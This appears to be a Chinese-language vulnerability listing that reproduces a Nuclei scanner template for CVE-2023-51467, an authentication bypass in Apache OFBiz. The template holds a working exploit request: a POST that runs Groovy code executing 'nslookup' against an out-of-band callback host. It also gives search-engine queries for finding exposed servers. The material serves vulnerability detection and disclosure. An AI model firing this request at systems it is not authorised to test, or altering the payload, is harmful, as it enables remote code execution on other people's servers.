CVE-2023-51467: Apache OFBiz < 18.12.11 - Remote Code Execution

日期: 2025-08-01 | 影响软件: Apache OFBiz | POC: 已公开

漏洞描述

The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)

PoC代码[已公开]

id: CVE-2023-51467

info:
  name: Apache OFBiz < 18.12.11 - Remote Code Execution
  author: your3cho
  severity: critical
  description: |
    The vulnerability allows attackers to bypass authentication to achieve a simple Server-Side Request Forgery (SSRF)
  reference:
    - https://lists.apache.org/thread/9tmf9qyyhgh6m052rhz7lg9vxn390bdv
    - https://www.openwall.com/lists/oss-security/2023/12/26/3
    - https://twitter.com/_0xf4n9x_/status/1740202435367543183
    - https://nvd.nist.gov/vuln/detail/CVE-2023-51467
    - https://issues.apache.org/jira/browse/OFBIZ-12873
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-51467
    cwe-id: CWE-918
    epss-score: 0.93996
    epss-percentile: 0.99885
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query:
      - html:"OFBiz"
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - app="Apache_OFBiz"
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve2023,cve,apache,ofbiz,rce,vkev

http:
  - raw:
      - |
        POST /webtools/control/ProgramExport;/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        groovyProgram=import+groovy.lang.GroovyShell%3B%0A%0AString+expression+%3D+%22'nslookup+{{interactsh-url}}'.execute()%22%3B%0AGroovyShell+gs+%3D+new+GroovyShell()%3B%0Ags.evaluate(expression)%3B

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: header
        words:
          - 'OFBiz.Visitor='
# digest: 490a00463044022025fd1edf82350f47673a8db37e417cbd9cb947cc02cc4887ac08847244f2cca2022039f2268a8cabb6bd851c907fb10a04960412f32afd07cffe17b8436a6d022ea3:922c64590222798bb761d5b6d8e72950

相关漏洞推荐